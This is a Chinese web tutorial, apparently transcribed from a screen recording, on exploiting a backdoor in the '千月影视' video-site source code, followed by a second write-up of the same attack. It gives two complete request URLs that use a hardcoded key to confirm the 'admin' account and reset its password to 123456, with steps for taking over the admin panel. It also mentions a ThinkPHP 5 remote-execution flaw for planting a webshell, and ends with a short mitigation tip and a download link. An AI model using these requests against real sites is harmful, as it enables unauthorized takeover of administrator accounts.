千月影视0day利用教程

小帅帅 77559 0

大家好 我今天 教你们 千月影视双端 的后门利用方法

放首歌 先 电脑有点卡 ... 录屏就这样 崩溃了

这个是我刚才用工具扫出来的

这个应该是 千月影视双端 经典的样子 一眼就可以看出来

成功了 可能有的人说密码本身默认的

我继续给你们看一下

给你们解释一下 第一段代码是判断 用户名是否存在 第二段是修改 不光可以修改 管理员密码 还可以修改代理 知道用户名就可以

因为时间问题 这里我说一下 千月用的是tp5 框架还有 远程执行漏洞 直接放大马

这个应该是作者原本留的防止忘记密码 但是被黑客利用了

好了 本期到此结束

请多多关注发布本教程的网站 感谢你们的支持

域名+/login/login/yzcode?username=admin&key=465454&password=123456

域名+/login/login/repass?username=admin&key=465454&password=123456

链接: https://pan.baidu.com/s/1-d0gLpwlZjh4AtVRyL2FSQ 提取码: nzui

温馨提示:网上的源码没有一个是好的,一分钱一分货,各种后门代码不止这些,想要运营的话最好买一套好点的源码

使用方法:我们先运行第一段代码,如果显示成功,就是可以改密码,然后我们在运行第二段代码就可以了。

然后账号密码就变成admin 123456

预防方法:我们把管理员用户名更改一下,不要让别人知道就改不了,我演示是给大家看


第二版本讲解

千月影视双端漏洞,在运营的注意了!!

前几天已经爆出漏洞利用代码 拿后台!!!

接下来看好了!!

XXXX/login/login/yzcode?username=admin&key=465454&password=123456

复制以上代码

如果出现下面的结果,则表示可以更改


接下来

XXXX/login/login/repass?username=admin&key=465454&password=123456

显示


出现以上结果,则表示,

账户 admin

密码已被更改为123456

拿下

目前爆出来的漏洞适用于旧版本,账户名为admin的

………………

所以,在运营的 如果用户名为admin!!!请马上更改!!!个别有动手能力的 改了安全码的 那就不用了

热门推荐:

关键词优化多久能学会排名,有什么好处

男子因误操作三伏天被困共享汽车中,热到几乎虚脱

《守望先锋》再次开启免费试玩:购买仅需38元

警方档案细节:刘强东案女主曾要求赔偿和道歉,否则追究刑事责任

日本制裁范围可能扩大,将重创韩国半导体产业

深圳SEO:SEO从业者,选择什么方向更合适?

执法规范化建设“东台样本”:让每一次执法活动闪耀公平正义

【践行新使命 忠诚保大庆】石峰美警群英谱之罗镇湘

传博通收购赛门铁克获得银行贷款承诺,或本月达成

推广营销心法 10倍高转化必赚干货!

标签: 0day web渗透

发表评论 (已有0条评论)

还木有评论哦,快来抢沙发吧~